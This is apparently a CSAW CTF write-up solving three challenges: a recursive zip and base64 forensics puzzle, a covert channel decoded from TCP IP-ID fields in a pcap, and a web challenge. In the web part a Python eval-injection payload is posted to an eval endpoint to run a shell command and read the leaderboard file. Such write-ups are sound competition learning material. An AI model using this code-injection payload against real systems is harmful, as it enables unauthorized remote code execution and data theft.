CSAW (see-SAW) is the world’s most comprehensive student-run cybersecurity event. It serves as an engaging platform for experiential learning and aims to inspire students to pursue education and careers in the field of cybersecurity.
Forensics
ZipZipZipZi…
Brighten up at last with the flag
We are given a singular zip file. When unzipping with unzip challenge.zip, we are given chunk1.zip and chunk0.txt. Looking at chunk0.txt, it looks like base64. So, we can assume we need to recursively unzip, grab all the chunks, and convert our base64 into a file.
import subprocess
import base64
nextZip = "challenge.zip"
chunks = []
try:
while True:
if "zip" not in nextZip: break
unzip = f"unzip {nextZip}"
rm = f"rm {nextZip}"
output = subprocess.check_output(unzip, shell=True).decode()
if "extracting" in output:
print(output)
nextZip = output.split()[-1]
print(f"Extracted {nextZip}")
chunks.append(nextZip.replace(".zip", ".txt"))
subprocess.check_output(rm, shell=True)
else:
print("Finished")
break
except KeyboardInterrupt:
print("ok we done")
pass
base64png = ""
for chunk in chunks[:-1]:
with open(chunk, "r") as f:
base64png += f.read().strip()
with open("flag.png", "wb") as f:
f.write(base64.b64decode(base64png + "=="))Covert
It appears there’s been some shady communication going on in our network…
Taking a quick look through the pcap, we notice some HTTP streams. For example, we find one with a Referer of ‘https://people.cs.georgetown.edu/~clay/classes/spring2009/555/papers/Embedding_Covert_Channels_into_TCPIP.pdf’. Additionally, we can find what seems to be the script they used to do this covert TCP communication.
# ez covert transfer...
from scapy.all import IP, TCP, send
key = ??
dst_ip = "X.X.X.X"
dst_port = ?????
src_ip = "X.X.X.X"
src_port = ?????
def encode_message(message):
for letter in message:
ip = IP(dst=dst_ip, src=src_ip, id=ord(letter)*key)
tcp = TCP(sport=src_port, dport=dst_port)
send(ip/tcp)
encode_message("????????????")Quickly grabbing some of the first TCP packets, we can determine the original key.
mapping = {
ord('c'): 5445,
ord('s'): 6325,
ord('a'): 5335
}
# Find key where:
# ord('c') * key = 5445
# ord('s') * key = 6325
# ord('a') * key = 5335
for key in range(10000):
if key * ord('c') == 5445 and key * ord('s') == 6325 and key * ord('a') == 5335:
print(key)
break
KEY = 55
import pyshark
pcap = pyshark.FileCapture('covert.pcapng')
for packet in pcap:
try:
ip_id = int(packet.ip.id, 16)
print(chr(ip_id // KEY), end='')
except Exception:
passThis script finds the key using three known characters (csa from the flag format of csawctf{). Then we can iterate through the pcap and decode the flag.
Web
playing on the backcourt
yadayada playing tennis like pong yadayada someone’s cheating yadayada at least the leaderboard is safe!
Looking through all the endpoints, you can simply make a POST /get_eval and you basically get RCE. Unsure if this was intended, but simple enough:
import requests
def deep_eval(expr:str) -> str:
try:
nexpr = eval(expr)
except Exception as e:
return expr
return deep_eval(nexpr)
cmd = "__import__('subprocess').check_output('cat leaderboard.txt', shell=True).decode()"
print(deep_eval(cmd))
BASE = 'https://backcourts.ctf.csaw.io/'
r = requests.post(BASE+'get_eval',
json={"expr": cmd}
)
print(r.text)